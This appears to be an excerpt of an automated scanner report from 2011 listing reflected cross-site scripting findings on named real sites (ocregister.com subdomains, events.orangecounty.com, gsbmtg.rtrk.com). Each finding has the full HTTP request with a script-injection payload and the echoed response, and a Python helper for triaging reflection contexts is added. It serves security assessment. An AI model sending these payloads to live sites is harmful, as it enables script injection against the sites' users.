ETag: "242db8931148a3dfc98ba516700c83a1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=...[SNIP]...%3D%3D--7e15617fc40bd48892f472ccad6abcf17f0e2f0e; path=/; expires=Tue, 03-May-2011 19:05:56 GMT; HttpOnly
Content-Length: 19242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
;
google_ad_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11bd510</script><a b=c>535a6ed6f38 Irvine,CA events";

//-->
...[SNIP]...

1.130. http://events.ocregister.com/search [swhat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 319
ETag: "904a9aaeecaa3760ec4ae913352ea43f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlZDAyNjcyNTliZDUyMTA5NTQ0YTQ3MmQxZWQzOTUyOWYiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCImc3VwZXJib3dsMTEzNjQ2OTxhIGI9Yz4yNzE5Y2JiNmFiIg5sYXN0X3doZW4iACILYnVja2V0RiINbGFzdF9yc3MiACINbG9jYXRpb257ECIJY2l0eSILSXJ2aW5lIgtyYWRpdXNpIyINbGF0aXR1ZGVmGjMzLjY3MTM5OTk5OTk5OTk5OABEZyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0lydmluZSwgQ0EiDXRpbWV6b25lIhhBbWVyaWNhL0xvc19BbmdlbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmEC0xMTcuNzkxAMi0IhF3aGVyZV9zdHJpbmciDklydmluZSxDQSIKc3RhdGUiB0NB--49479bafbda8b6a30f182d75b202be3c0913946a; path=/; expires=Tue, 03-May-2011 19:06:32 GMT; HttpOnly
Content-Length: 18888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
&amp;new=n&amp;search=true&amp;srad=30&amp;srss=&amp;st=any&amp;st_select=event&amp;svt=text&amp;swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&amp;swhen=&amp;swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a>
...[SNIP]...
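
Issues 1.129 and 1.130 are reported at confidence "Firm" because the scanner got tags through but could not complete a JavaScript proof of concept, while the surrounding entries are "Certain". Triaging a batch like this comes down to two questions per entry: is the marker in the response byte-for-byte, and which parsing context does it land in. The classifier below is an added example, not the crawler's code, that answers both from a response body and the unique marker string; the sample bodies in its checks are constructed from the fragments shown in this report. One caveat it encodes: the HTML parser ends a script element at the first "</script", whatever the JavaScript quoting state, so a reflected "</script>" inside a string literal (1.129) is a context break even where no PoC was completed.

```python
def _find_tag_end(body, start):
    """Index just past the '>' that closes the tag starting at `start`."""
    end = body.find(">", start)
    return len(body) if end < 0 else end + 1


def _js_string_state(script_text):
    """Walk JavaScript source and report which string literal (if any) is
    still open at its end: '"', "'", '`' or None. Handles backslash escapes
    and // and /* */ comments, which is enough for template-emitted code."""
    state = None
    i = 0
    n = len(script_text)
    while i < n:
        ch = script_text[i]
        if state is None:
            if ch in "\"'`":
                state = ch
            elif script_text.startswith("//", i):
                nl = script_text.find("\n", i)
                i = n if nl < 0 else nl
            elif script_text.startswith("/*", i):
                close = script_text.find("*/", i + 2)
                i = n if close < 0 else close + 1
        else:
            if ch == "\\":
                i += 1            # skip the escaped character
            elif ch == state:
                state = None
        i += 1
    return state


def reflection_context(body, marker):
    """Locate `marker` in a response body and classify where it landed.

    Returns a dict with: reflected (marker present unmodified), context
    (one of 'not reflected', 'html text', 'html attribute (double-quoted)',
    'html attribute (single-quoted)', 'html tag (unquoted)', 'js string
    (double-quoted)', 'js string (single-quoted)', 'js string (template)',
    'js code'), and escapes_context (whether the marker's own characters
    are enough to leave that context, as the scanner's payloads do)."""
    idx = body.find(marker)
    if idx < 0:
        return {"reflected": False, "context": "not reflected", "escapes_context": False}
    before = body[:idx]
    lower = before.lower()

    # Script element: the HTML tokenizer ends it at the first "</script",
    # regardless of what the JavaScript around it looks like.
    open_script = lower.rfind("<script")
    close_script = lower.rfind("</script")
    if open_script > close_script:
        script_text = body[_find_tag_end(body, open_script):idx]
        quote = _js_string_state(script_text)
        if quote is None:
            context = "js code"
        else:
            kind = {'"': "double-quoted", "'": "single-quoted", "`": "template"}[quote]
            context = "js string (%s)" % kind
        escapes = ("</script" in marker.lower()) or (quote is not None and quote in marker)
        return {"reflected": True, "context": context, "escapes_context": escapes}

    # Inside a tag: the last "<" is more recent than the last ">".
    lt = before.rfind("<")
    gt = before.rfind(">")
    if lt > gt:
        tag_text = before[lt:]
        dq = tag_text.rfind('="')
        sq = tag_text.rfind("='")
        pos, quote = max((dq, '"'), (sq, "'"))
        if pos >= 0 and tag_text.count(quote, pos + 2) == 0:
            kind = "double-quoted" if quote == '"' else "single-quoted"
            return {"reflected": True, "context": "html attribute (%s)" % kind,
                    "escapes_context": quote in marker}
        return {"reflected": True, "context": "html tag (unquoted)",
                "escapes_context": ">" in marker or " " in marker}

    return {"reflected": True, "context": "html text", "escapes_context": "<" in marker}
```

The classifier deliberately reads only the text before the marker, so a "</script>" carried by the payload itself (1.129) counts as a context break rather than as the end of the script element it sits in. It is a triage aid, not a browser: a finding it labels as escaping its context still needs the response loaded in a real browser to confirm execution, and one it labels "not reflected" should be re-checked with the encoded forms the server may have applied.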

1.131. http://events.ocregister.com/search [swhen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "9d9076ac94b1cfc6678e7c3e3c15d6e9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYmMyYWFhZWFhMzMxYWEzMmY0Mzc5ZTZjZTliNzcwMWIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIuODVkZjA8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BNDA0YTE5OTc1NzIiC2J1Y2tldEYiDWxhc3RfcnNzIgAiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nIg5JcnZpbmUsQ0EiCnN0YXRlIgdDQQ%3D%3D--2523d0baef5e6ef9f9771c16975a4313e2909934; path=/; expires=Tue, 03-May-2011 19:07:23 GMT; HttpOnly
Content-Length: 19667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

1.132. http://events.ocregister.com/search [swhere parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 1138
ETag: "468d769b70f16b15874182577d12a1ab"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNWQzNTk1YjIwZGEzOGQxYjAxZWY4MDYzOTdlZjU3NzUiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIqSXJ2aW5lLENBYTIxOGMiO2FsZXJ0KDEpLy8yNWZlYmU3ODQ1YSIKc3RhdGUiB0NB--42c543cfa16a16509c98ac9cf99589674206e7ce; path=/; expires=Tue, 03-May-2011 19:07:50 GMT; HttpOnly
Content-Length: 19341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
d_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CAa218c";alert(1)//25febe7845a events";

//-->
...[SNIP]...

1.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "461e66ba3abcf21317119f039b7ecc26"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNmQ4NmVkZjY4NmUzMjkwODEyN2E4MmI3ZDlkNDBlYWQiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--30890568bf662ec39e975be34aca81d31951bc89; path=/; expires=Tue, 03-May-2011 19:05:12 GMT; HttpOnly
Content-Length: 41476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" />
...[SNIP]...

1.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.orangecounty.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "8b8ae40e2ec1f011dfdb66c80bbcae14"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: zvents_tracker_sid=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMjUzNDE5NGU4ZmI2MDZlOWZlZGZjYzBlYzkzOGVhMjUiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaTciDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0234d99676f0e755442d2bdfa35eb38ed6b7ff6f; path=/; expires=Tue, 03-May-2011 19:05:13 GMT; HttpOnly
Content-Length: 74110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?fcc4c"><script>alert(1)</script>b1440f97378=1" />
...[SNIP]...

1.135. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" />
...[SNIP]...

1.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78253


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" />
...[SNIP]...

1.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ed"><script>alert(1)</script>27d26f5a006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scid=1794971&328ed"><script>alert(1)</script>27d26f5a006=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:14 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308111464447; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:06 GMT;path=/;httponly
Content-Length: 2952


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308111464447&rl_key=f5b32d99050a33d25f2b118f50fbe9bc&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&328ed"><script>alert(1)</script>27d26f5a006=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

1.138. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d57"><script>alert(1)</script>3b3d1a7631b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.139. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfc43'><script>alert(1)</script>24de61d88b7 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
